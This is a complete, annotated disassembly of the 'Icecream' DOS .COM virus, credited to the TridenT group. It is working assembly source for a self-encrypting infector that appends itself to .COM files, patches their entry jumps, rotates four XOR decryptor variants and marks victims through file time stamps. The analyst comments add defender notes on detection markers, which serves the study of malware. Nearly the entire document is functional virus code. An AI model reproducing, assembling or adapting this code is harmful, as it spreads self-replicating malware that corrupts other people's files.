;Icecream Virus by the TridenT virus research group.

;This is a simple direct-action .COM infector that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It infects one .COM file in the current directory every time it is
;executed.  It marks infected files through the file's time stamp.


;Disassembly by Black Wolf

; Syntax: MASM/TASM (Intel operand order), 16-bit real-mode DOS .COM image.
; All segment registers are equal; code is assembled at origin 100h and
; every data reference in the body is made relative to bp (load delta).
.model tiny
.code
        org     100h

; Analyst note: in this generation-0 listing the entry jump lands directly
; on Virus_Entry (100h + 3 + 0Ch = 10Fh).  In an infected host the three
; bytes at offset 0 are JumpBytes/JumpSize (written by InfectFile) and the
; jump lands on a 12-byte decryptor instead, so "0E9h at offset 0" is not
; by itself an indicator; the time-stamp mark set in InfectFile is.
start:
        db      0e9h,0ch,0       ;jmp     Virus_Entry  (rel16 = 0Ch -> 10Fh)

; 12 bytes at 103h-10Eh.  In this listing they hold the author string and a
; backward "loop"; SetupEncryption overwrites 103h-10Ch with the chosen
; decryptor variant (see "lea di,[bp+103h]" there) before the image is
; written out, so an infected file carries a decryptor in this slot.
Author_Name     db      'John Tardy'

        db      0E2h,0FAh        ;loop -6 : tail of the in-place decryptor.
                                 ;Bit 1 of the 0E2h at 10Dh is flipped by
                                 ;SetupEncryption on every infection.
;-----------------------------------------------------------------------
; Virus_Entry: main routine, reached from the 3-byte jump at offset 0.
; In:    ax = value at .COM entry (saved here, restored before the host runs)
; Uses:  bp = load delta = runtime address of Get_Offset minus its
;        assembled offset (0 in this listing); data is addressed [bp+label].
; Side effects: DTA moved to 0F900h during the directory search, then reset
;        to the PSP default 80h; the host's original 3 bytes (kept in
;        Storage) are written back to 100h before control returns there.
; Assumes ds = es = cs and DF clear (movsw/movsb below) -- as at .COM entry.
;-----------------------------------------------------------------------
Virus_Entry:
        push    ax
        call    Get_Offset
Get_Offset:
        pop     ax                      ;ax = runtime address of Get_Offset
        sub     ax,offset Get_Offset    ;ax = load delta

        db      89h,0c5h         ;mov     bp,ax  (hand-encoded alternative
                                 ;encoding of the same instruction)
        lea     si,[bp+Storage]
        mov     di,100h                 ;Restore host's original 3 bytes
        movsw                           ;at 100h: 2 bytes ...
        movsb                           ;... + 1 byte

        mov     ah,1Ah
        mov     dx,0f900h
        int     21h                     ;Set DTA to 0F900h (scratch area above
                                        ;the body; Find results land here)

        mov     ah,4Eh                  ;Find First; DoneInfect re-enters the
                                        ;loop with ah = 4Fh (Find Next)

FindFirstNext:
        lea     dx,[bp+ComMask]         ;"*.CoM"
        xor     cx,cx                   ;attribute mask 0: normal files only
        int     21h                     ;Find File
        jnc     InfectFile              ;candidate found -> try to infect it

Restore_DTA:
        mov     ah,1Ah
        mov     dx,80h
        int     21h                     ;Set DTA to default (PSP:80h)

        mov     bx,offset start         ;= 100h
        pop     ax                      ;recover entry ax
        push    bx
        retn                            ;Return to host: "jump" to 100h

;-----------------------------------------------------------------------
; InfectFile: append the encrypted image to the file named in the DTA and
; patch the file's first 3 bytes into a jump to it.
; In:    DTA at 0F900h; file name at 0F91Eh (DTA+1Eh); bp = load delta
; Stack while the file is open (top first): dx = date, cx = time word
;        (marked on the infection path), then the original attribute word.
;        FinishFile pops all of these.
; Skips: files already marked, and files whose first two bytes are an EXE
;        signature.  Only the low word of the file size (ax) is used.
; Infection mark: the seconds/2 field (low 5 bits of the DOS time word)
;        is forced to 1.  Defender note: a .COM whose time stamp has that
;        field equal to 1 (i.e. :02 seconds) was touched by this code.
;-----------------------------------------------------------------------
InfectFile:
        mov     ax,4300h
        mov     dx,0f91eh               ;DTA+1Eh: name returned by Find
        int     21h                     ;Get file attribs -> cx

        push    cx                      ;save 'em (popped in FinishFile)
        mov     ax,4301h
        xor     cx,cx
        int     21h                     ;Set them to 0 (clears read-only so the
                                        ;file can be opened for writing)

        mov     ax,3D02h
        int     21h                     ;Open file read/write -> ax = handle

        mov     bx,5700h
        xchg    ax,bx                   ;ax = 5700h, bx = handle
        int     21h                     ;Get file time -> cx = time, dx = date

        push    cx
        push    dx                      ;save it
        and     cx,1Fh                  ;seconds/2 field of the time word
        cmp     cx,1                    ;check for infection (mark value 1)
        jne     ContinueInfection
        db      0e9h,69h,0              ;jmp     DoneInfect  (rel16 = +69h)

ContinueInfection:
        mov     ah,3Fh
        lea     dx,[bp+Storage]
        mov     cx,3
        int     21h                     ;Read in first 3 bytes -> Storage

        mov     ax,cs:[Storage+bp]
        cmp     ax,4D5Ah                ;Is it an EXE?  (bytes 'Z','M')
        je      DoneInfect
        cmp     ax,5A4Dh
        je      DoneInfect              ;Other EXE signature? (bytes 'M','Z')

        pop     dx
        pop     cx
        and     cx,0FFE0h               ;Change stored time values
        or      cx,1                    ;to mark infection (seconds/2 := 1)
        push    cx
        push    dx

        mov     ax,4202h                ;Go to the end of the file
        call    Move_FP                 ;ax = low word of file size
        sub     ax,3                    ;rel16 measured from the end of the
        mov     cs:[JumpSize+bp],ax        ;3-byte jmp; Save jump size

        add     ax,10Fh                    ;Save encryption starting
        mov     word ptr [bp+EncPtr1+1],ax ;point: runtime address the body
        mov     word ptr [bp+EncPtr2+1],ax ;will occupy in the new host
        mov     word ptr [bp+EncPtr3+1],ax ;(patches the "mov si/di,0"
        mov     word ptr [bp+EncPtr4+1],ax ;immediate of all four variants)
        call    SetupEncryption            ;Encrypt virus -> image at 0FA00h

        mov     ah,40h
        mov     dx,0fa00h
        mov     cx,1F5h
        int     21h                     ;Write virus to file: 1F5h bytes =
                                        ;0Ch decryptor + 1E9h encrypted body

        mov     ax,4200h
        call    Move_FP                 ;Go to the beginning of file

        mov     ah,40h
        lea     dx,[bp+JumpBytes]
        mov     cx,3
        int     21h                     ;Write in jump (0E9h + JumpSize)

        call    FinishFile              ;restore stamp/attributes, close
        jmp     Restore_DTA             ;one infection per run

DoneInfect:
        call    FinishFile              ;leave this file as found, close
        mov     ah,4Fh
        jmp     FindFirstNext           ;Find Next

;-----------------------------------------------------------------------
; Move_FP: int 21h/42h seek with offset cx:dx = 0.
; In:  ax = 42xxh (4200h = from start, 4202h = from end), bx = handle
; Out: dx:ax = resulting file position (ax = low word), cx = 0
;-----------------------------------------------------------------------
Move_FP:
        xor     cx,cx
        xor     dx,dx                   ;offset 0 relative to the origin in al
        int     21h
        ret

;-----------------------------------------------------------------------
; FinishFile: write back the file's time/date and attributes, then close.
; Stack on entry (top first): return address, dx = date, cx = time word
;        (carries the infection mark on the infection path), attribute
;        word pushed by InfectFile.  All three are popped; the return
;        address is pushed back before retn.
; In:   bx = file handle
; Uses: si as temporary for the return address.
;-----------------------------------------------------------------------
FinishFile:
        pop     si dx cx                ;si = return addr, dx = date, cx = time
        mov     ax,5701h                ;Reset file time/date stamp
        int     21h                     ;(or mark infection)

        mov     ah,3Eh
        int     21h                     ;Close new host file

        mov     ax,4301h
        pop     cx                      ;original attribute word
        mov     dx,0fc1eh               ;NOTE(review): InfectFile addresses the
                                        ;name at 0F91Eh (DTA+1Eh); this offset
                                        ;differs, so as listed the attribute
                                        ;restore may not address the found
                                        ;name -- transcription artefact or
                                        ;original defect, cannot tell here.
                                        ;Touched files may therefore be left
                                        ;with attributes cleared.
        int     21h                     ;Restore old attributes

        push    si
        retn

; Text carried in the body; not referenced by any code in this listing.
; It lies past 10Fh, so in an infected file it is XORed with the key like
; the rest of the body and is only visible in clear after decryption
; (or in this generation-0 image).
Message         db      ' I scream, you scream, we both '
        db      'scream for an ice-cream! '

;-----------------------------------------------------------------------
; SetupEncryption: assemble the image InfectFile writes, at 0FA00h.
; In:   bp = load delta; EncPtrN+1 immediates already patched by InfectFile
; Out:  0FA00h..0FA0Bh = 12-byte decryptor (one of 4 variants, chosen and
;       keyed from the BIOS tick count at 0000:046Ch);
;       0FA0Ch..       = 1E9h bytes of [bp+10Fh..] XORed with the key byte
;       dl = key byte.  On key 0 the decryptor slot gets the author string
;       instead and JumpSize is advanced past it (body written in clear).
; Clobbers: ax, cx, dx, si, di; es is set to 0 and restored to cs.
; Side effect: flips bit 1 of the byte at [bp+10Dh] (the decryptor's loop
;       opcode, 0E2h in this listing) on every call.
; Defender note: the decryptor's opcode bytes are fixed apart from two
;       16-bit immediates, the key byte, the si/di choice and that one
;       opcode bit, so the emitted decryptors form a small family.
;-----------------------------------------------------------------------
SetupEncryption:
        xor     byte ptr [bp+10Dh],2    ;toggle bit 1 of the loop opcode
        xor     ax,ax
        mov     es,ax
        mov     ax,es:[46ch]            ;Get random number: BIOS timer tick
                                        ;count (0000:046Ch)
        push    cs
        pop     es                      ;es = cs again
        push    ax                      ;keep raw tick value
        and     ax,7FFh
        add     ax,1E9h                 ;decrypt length = 1E9h + (tick & 7FFh)
        mov     word ptr [bp+EncSize1+1],ax  ;patch "mov cx,0" immediate of
        mov     word ptr [bp+EncSize2+1],ax  ;all four variants (may exceed
        mov     word ptr [bp+EncSize3+1],ax  ;the body length; the surplus
        mov     word ptr [bp+EncSize4+1],ax  ;XORs bytes past the body)
        pop     ax
        push    ax
        and     ax,3
        shl     ax,1                    ;(tick & 3) * 2 = word index into EncData
        mov     si,ax
        mov     ax,[bp+si+EncData1]     ;assembled offset of chosen variant
        add     ax,bp
        mov     si,ax                   ;si = its runtime address
        lea     di,[bp+103h]
        movsw
        movsw
        movsw
        movsw                   ;Copy Encryption Algorithm: first 8 bytes -> 103h
        pop     ax              ;al = low byte of tick = XOR key
        stosb                   ;key replaces the xor imm8 (10Bh)
        movsb                   ;variant's 9th byte (46h/47h) -> 10Ch: it
                                ;executes as inc si / inc di in the decryptor
        mov     dl,al           ;dl = key
        lea     si,[bp+103h]
        mov     di,0fa00h
        mov     cx,0Ch
        rep     movsb           ;12-byte decryptor -> 0FA00h
        lea     si,[bp+10Fh]
        mov     cx,1E9h         ;body length in bytes

EncryptVirus:
        lodsb
        db      30h,0d0h                ;xor     al,dl  (hand-encoded)
        stosb                           ;encrypted body -> 0FA0Ch onward
        loop    EncryptVirus

        cmp     dl,0
        je      KeyWasZero              ;key 0 would leave the body in clear
        retn

KeyWasZero:                                     ;If key is zero, increase
        mov     si,offset AuthorName    ;jump size and place name
        mov     di,0fa00h               ;at beginning....
        mov     cx,0Ah
        rep     movsb                   ;10-byte name over the decryptor slot
        mov     ax,cs:[JumpSize+bp]
        add     ax,0Ch
        mov     cs:[JumpSize+bp],ax     ;entry jump skips the 12-byte slot
        retn

        db      '[TridenT]'             ;group tag; unreferenced by code.
                                        ;Static marker of the decrypted body

; Offsets of the four decryptor variant templates below (each 9 bytes
; apart).  SetupEncryption indexes this table with (tick & 3) * 2 and adds
; bp to get the runtime address.
EncData1        dw      02beh
EncData2        dw      02c7h
EncData3        dw      02d0h
EncData4        dw      02d9h

; Decryptor variant templates (9 bytes each).  They are never executed
; here: SetupEncryption copies the first 8 bytes of the chosen variant to
; [bp+103h], stores the key byte in place of the xor immediate, then copies
; the 9th byte (the 46h/47h immediate, which executes as inc si / inc di
; after the key) as the following instruction.  The two "mov ...,0"
; immediates are patched in place before the copy: EncPtrN+1 by
; InfectFile (body address in the new host), EncSizeN+1 by
; SetupEncryption (byte count).  Variants differ only in register (si/di)
; and in the order of the two mov instructions.
Encryptions:
;------------------------------------------------------------
EncPtr1:
        mov     si,0                    ;imm16 patched: body start
EncSize1:
        mov     cx,0                    ;imm16 patched: length
        xor     byte ptr [si],46h       ;imm8 replaced by key; 46h = inc si
;------------------------------------------------------------
EncPtr2:
        mov     di,0
EncSize2:
        mov     cx,0
        xor     byte ptr [di],47h       ;imm8 replaced by key; 47h = inc di
;------------------------------------------------------------
EncSize3:
        mov     cx,0                    ;same as variant 1, movs swapped
EncPtr3:
        mov     si,0
        xor     byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
        mov     cx,0                    ;same as variant 2, movs swapped
EncPtr4:
        mov     di,0
        xor     byte ptr [di],47h
;------------------------------------------------------------

AuthorName      db      'John Tardy'    ;10 bytes; source for KeyWasZero

JumpBytes       db      0E9h            ;3-byte "jmp rel16" written to offset 0
JumpSize        dw      0               ;of the new host; rel16 set by InfectFile

ComMask         db      '*.CoM',0       ;Find First pattern (mixed case; DOS
                                        ;name matching is case-insensitive)

Storage         dw      20CDh           ;host's original 3 bytes, loaded by
        db      21h                     ;InfectFile and restored at 100h by
                                        ;Virus_Entry.  Initial bytes CD 20 21
                                        ;= int 20h (terminate) + one extra
                                        ;byte, so the host-less generation-0
                                        ;image simply exits after running

end     start
